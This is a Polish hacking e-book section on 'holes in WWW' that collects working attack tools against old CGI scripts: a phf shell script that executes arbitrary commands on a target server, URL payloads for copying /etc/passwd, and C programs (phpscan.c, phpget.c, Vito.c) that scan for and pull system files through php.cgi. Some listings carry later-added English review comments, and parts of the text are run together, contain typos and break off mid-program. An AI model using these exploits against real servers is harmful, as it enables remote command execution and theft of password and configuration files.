dziury w www, e-booki (Informatyka), Hacking
Dyiurz w WWWDziury w WWW.1 phf - sciaganie passwd przez przegladarke : P0WERJeden ze starych sposobow:(dla lam: w miejsce xxx.xxx.xxx wpisujesz adres servera. ktory jest celemataku np free.polbox.pl)Jesli hasla beda shadowane(!, * itd w miejscu hasel) to mozna sprobowac/etc/shadow , ale male szanse, ze zadziala.Ale lepiej uzyc kilku komend:me=&Qoffice_phone=haqr&Qemail=&Qnickname=&Qoffice_phone=%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone==haqr&Qemail=&Qnickname=&Qoffice_phone=Wykonaja one cos w tym stylu:idls -la ~someusercp /etc/passwd ~someuser/passwd(normal URL access to get the passwd file)rm ~someuser/passwdW ten sposob mozna nawet probowac czytac czyjas poczte. (np admina)/...lub takA tutaj macie program, ktory sluzy go phf.-----cut here----#!/bin/sh# Coded by: AgentOrangeecho "Enter the domain you wish to try the phf bug on."read hostif [ "$host" = "*" ] ; thenexit 1fiecho "Enter the command you wish to execute"read comif [ "$com" = "*" ] ; thenexit 1fiecho "Enter the file you with to execute this command on, if any"read fileif [ "$file" = "*" ] ; thenexit 1filynx $host/cgi-bin/phf?Qname=root%0A$com%20$fileexit 0----cut here-----2 php - Nowa dziura znaleziona przez DIS (16-04-97) : P0WERJest to dziura w skrypcie cgi z httpd (PHP/FI).Pozwala ona na przegladanie plikow z servera.a oto prosty przyklad:3 phpscan.c skaner php : P0WERJest to program skanujacy servery pod katem dziury w php.phpscan domeny.txt wynik.txt----cut here---/*phpscan.c : php.cgi vunerable server scanning program.Basically a modified phf scanner, by Alhambra of The Guild.Modifications to php.cgi by so1o of The CodeZero.Usage:phpscan <infile> <outfile>*/#include <sys/stat.h>#include <sys/types.h>#include <termios.h>#include <unistd.h>#include <stdio.h>#include <fcntl.h>#include <sys/syslog.h>#include <sys/param.h>#include <sys/times.h>#ifdef LINUX#include <sys/time.h>#endif#include <unistd.h>#include <sys/socket.h>#include <netinet/in.h>#include <sys/signal.h>#include 
<arpa/inet.h>
#include <netdb.h>

/* Timeout marker shared with the SIGALRM handler: main() sets it to 1 before
   each connect() and Call() clears it when the alarm fires. */
int FLAG = 1;

/* SIGALRM handler: records that the 10-second alarm armed in main() went off.
   Declared as returning int but has no return statement. */
int Call(int signo){
    FLAG = 0;
}

/*
 * Reads one host name per line from stdin and, for every host, opens a TCP
 * connection to port 80, sends the fixed request held in PHPMessage and
 * copies whatever comes back to stdout.
 *
 * The header comment advertises "phpscan <infile> <outfile>", but argc and
 * argv are never read: input is stdin and output is file descriptor 1.
 * The reply is not interpreted in any way; deciding whether a server
 * disclosed the file is left to whoever reads the output.
 *
 * Defender note: the probe is a single version-less request line for
 * cgi-bin/php.cgi with an absolute file path as the entire query string.
 * That request shape is the pattern to search for in web-server access logs.
 * The surrounding text describes the flaw as a file-disclosure hole in the
 * PHP/FI CGI script, so hosts that do not expose that script should not
 * answer the probe with file contents (not verifiable from this listing).
 */
main (int argc, char *argv[]){
    /* buffer, serv_len, len, c and outfd are declared but never used. */
    char host[100], buffer[1024], hosta[1024],FileBuf[8097];
    int outsocket, serv_len, len,X,c,outfd;
    struct hostent *nametocheck;
    struct sockaddr_in serv_addr;
    struct in_addr outgoing;
    /* Request sent to every host: no leading '/', no HTTP version, and a
       single '\n' as terminator. */
    char PHPMessage[]="GET cgi-bin/php.cgi?/etc/passwd\n";
    /* At most 99 characters of each input line are read, although hosta
       is 1024 bytes. */
    while(fgets(hosta,100,stdin)){
        if(hosta[0] == '\0')
            break;
        /* Drops the last character of the line, assumed to be the newline
           kept by fgets(); a final line without one loses a real character. */
        hosta[strlen(hosta) -1] = '\0';
        /* Echo the host name so the reply that follows can be attributed. */
        write(1,hosta,strlen(hosta)*sizeof(char));
        write(1,"\n",sizeof(char));
        /* NOTE(review): the socket() result is not checked. */
        outsocket = socket (AF_INET, SOCK_STREAM, 0);
        memset (&serv_addr, 0, sizeof (serv_addr));
        serv_addr.sin_family = AF_INET;
        /* NOTE(review): gethostbyname() returns NULL for a name that does not
           resolve; the result is dereferenced on the next line unchecked. */
        nametocheck = gethostbyname (hosta);
        (void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0],sizeof (outgoing.s_addr));
        /* The address is converted to dotted-quad text and straight back. */
        strcpy (host, inet_ntoa (outgoing));
        serv_addr.sin_addr.s_addr = inet_addr (host);
        serv_addr.sin_port = htons (80);
        /* Arm a 10-second alarm around connect(); FLAG is still 1 afterwards
           only if the alarm did not fire. */
        signal(SIGALRM,Call);
        FLAG = 1;
        alarm(10);
        X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
        alarm(0);
        if(FLAG == 1 && X==0){
            write(outsocket,PHPMessage,strlen(PHPMessage)*sizeof(char));
            /* The loop ends only on a 0 return; a -1 error from read() is
               passed on to write() as the length. */
            while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X);
        }
        close (outsocket);
    }
    return 0;
}
---eof---
4 phpget.c
Jest to program, ktorym poprzez php mozesz sciagnac kilka ciekawych
plikow:
/etc/passwd
/etc/hosts
/etc/services
/etc/syslogd.conf
/etc/inetd.conf
phpget <domena> <path do pliku>
phpget www.lamers.com /etc/passwd
---cut here---
/*
p1 (peewun@heterosexual.com)
This code retrieves a file using php.cgi on a remote system.
This program is for educational purposes only.
Use it on p1.com.
*/
#include <signal.h>
#include <stdio.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <string.h>

/* stdio stream wrapped around the socket by do_connect(). */
FILE *server;
/* Socket descriptor created by do_connect(). */
int sock;

void do_connect(char *host, char *toget);

/*
 * Resolves host, connects to TCP port 80, sends a one-line request for
 * /cgi-bin/php.cgi with toget appended as the query string, and prints the
 * reply line by line on stdout.
 *
 * host:  name handed to gethostbyname().
 * toget: text placed after "php.cgi?" in the request; it is sent exactly as
 *        given, with no encoding or validation.
 * Exits the process with status 0 when connect() fails.
 *
 * Defender note: the request is a version-less line of the form
 * "GET /cgi-bin/php.cgi?<path>" ended by a single newline. A filesystem path
 * directly after the '?' is the trace this client leaves in access logs.
 */
void do_connect(char *host, char *toget){
    char inbuf[1024];
    /* NOTE(review): sin is never zeroed; only the address, family and port
       fields are assigned below. */
    struct sockaddr_in sin;
    struct hostent *hp;
    char *tmpbuf;   /* never used */
    /* NOTE(review): a NULL result (name does not resolve) is dereferenced on
       the next line without a check. */
    hp = gethostbyname(host);
    bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
    sin.sin_family = hp->h_addrtype;
    sin.sin_port = htons(80);
    /* NOTE(review): the socket() result is not checked before connect(). */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if ( -1 < connect(sock, (struct sockaddr *) &sin, sizeof(sin)) ) {
        printf("Made connection to %s.\n\n", host);
    } else {
        printf("Failed to connect to %s.\n\n",host);
        exit(0);
    }
    /* NOTE(review): the fdopen() result is not checked. */
    server=fdopen(sock, "a+");
    fprintf(server, "GET /cgi-bin/php.cgi?%s\n",toget);
    printf("Output from php.cgi request:\n\n");
    while(1){
        if (fgets(inbuf, 1024, server) == NULL)
            break;
        /* NOTE(review): bytes received from the remote server are used as the
           printf format string, so '%' directives in a reply are interpreted
           by this client. printf("%s", inbuf) or fputs() would print the
           reply literally. */
        printf(inbuf);
    }
}

/*
 * Prints a banner, then either the usage text (fewer than two arguments) or
 * calls do_connect(argv[1], argv[2]).
 * After do_connect() returns the process exits with status 1; in the usage
 * branch control falls off the end of main without a return value.
 */
main(int argc,char **argv){
    printf("\nThis program retrieves files off a remote system usingphp.cgi.\n");
    printf("Author: p1 - peewun@heterosexual.com\n");
    if (argc < 3) {
        printf("Usage: %s <domain> <path and file>\n",argv[0]);
        printf(" Ex: %s www.p1.com /etc/passwd\n",argv[0]);
    }
    else {
        char *buffer;       /* never used */
        (char *)"exit";     /* expression statement with no effect */
        do_connect(argv[1],argv[2]);
        exit(1);
    }
}
---eof---
5 Vito.c - tester dziur servera http : P0WER (tested by wienio)
Jest to programi ktory laczy sie z serverem http poprzez port 80 i testuje
server pod katem wszelkich znanych dziur w http.
Jest w tym phf, php i pare dziur w cgi.
Spis dziur znajduje sie w pliku Vito.ini, mozna go edytowac.
Vito.c
---cut here---
/* V.I.T.O
Vicious Internet TOol by ET Lownoise Colombia 1997.
Copyshit (:Q~) ET 1997.
Test (T.E.S.T!!!) a web server for interesting MUST NOT HAVE cgi's.
note that this program sucks too.
2 Files:
-Vito.c
-Vito.ini <---- you can edit this one....so u can upgrade
this program.
Just follow the sintax.etorres@cyberservices.comWhy is necesary a disclaimer when nobody reads it?.Compile for dummies===================cc -o vito vito.cExecute for dummies===================vito <host>*/#include <stdio.h>#include <string.h>#include <sys/types.h>#include <sys/socket.h>#include <netinet/in.h>#include <netdb.h>#define TAMANO 1024int sock;struct sockaddr_in sock_dest;char host_dest[100];main(int argc,char *argv[]){FILE *ini; /*check for vito.ini*/int a,b,c,d,x;struct hostent *pastelito;char buffer[TAMANO],bufrec[TAMANO],buftmp[TAMANO],encabezado[50];if (argc < 2) {fprintf(stdout,"V.I.T.O by ET Lownoise 97\n");fprintf(stdout,"Usage: %s <host> [> file]\n",argv[0]);fprintf(stdout,"Note: I know this program sucks.. it\n");fprintf(stdout," just make things easy.\n");exit(0);}if((ini=fopen("vito.ini","r"))==NULL){fprintf(stdout,"%s needs his ini file: vito.ini\n",argv[0]);exit(0);}if (sscanf(argv[1],"%d.%d.%d.%d",&a,&b,&c,&d) != 4) {pastelito = gethostbyname(argv[1]);if (pastelito == NULL) {fprintf(stdout,"Ahhhhhhh! 
cannot resolve host %s\n",argv[1]);exit(0);}sprintf(host_dest,"%d.%d.%d.%d",(unsigned char )pastelito->h_addr_list[0][0],(unsigned char )pastelito->h_addr_list[0][1],(unsigned char )pastelito->h_addr_list[0][2],(unsigned char )pastelito->h_addr_list[0][3]);}else {strncpy(host_dest,argv[1],99);}fprintf(stdout,"V.I.T.O.\n");fprintf(stdout,"Attac...Testing host: %s ",host_dest);/*ET*/sock_dest.sin_family = AF_INET;sock_dest.sin_port = htons(80); /* wwwport */sock_dest.sin_addr.s_addr = inet_addr(host_dest);while(fgets(buffer,TAMANO,ini)!=NULL){ /*Buffer linesize*/if(buffer[0]=='['){/* Buffer division*/strcpy(buftmp,buffer);strcpy(buffer,strchr(buftmp,'G'));strncpy(encabezado,buftmp,strlen(buftmp)-strlen(buffer)+1);encabezado[strlen(buftmp)-strlen(buffer)]='\0';sock = socket(AF_INET,SOCK_STREAM,0);if(sock < 0) {fprintf(stdout,"ERROR: socket() failed\n");exit(0);}x = connect(sock,(struct sockaddr *)&sock_dest,sizeof(sock_dest));if(x < 0){fprintf(stdout,"Upps.. can't connect to port 80\n");}fprintf(stdout,"\n|-------------------------------------------------------------|\n");fprintf(stdout," CGI: %s\n",encabezado);fprintf(stdout," Sending.\n");fprintf(stdout," %s",buffer);fprintfstdout,"|-------------------------------------------------------------|\n");send(sock,buffer,TAMANO*sizeof(char),0);bzero(buffer,TAMANO);fprintf(stdout," Receiving.\n\n");while((x=recv(sock,bufrec,TAMANO*sizeof(char),0))!=0){fprintf(stdout,"%s",bufrec);bzero(bufrec,TAMANO);}close(sock);}}fclose(ini);fprintf(stdout,"\n|=============================================================|\n"); ...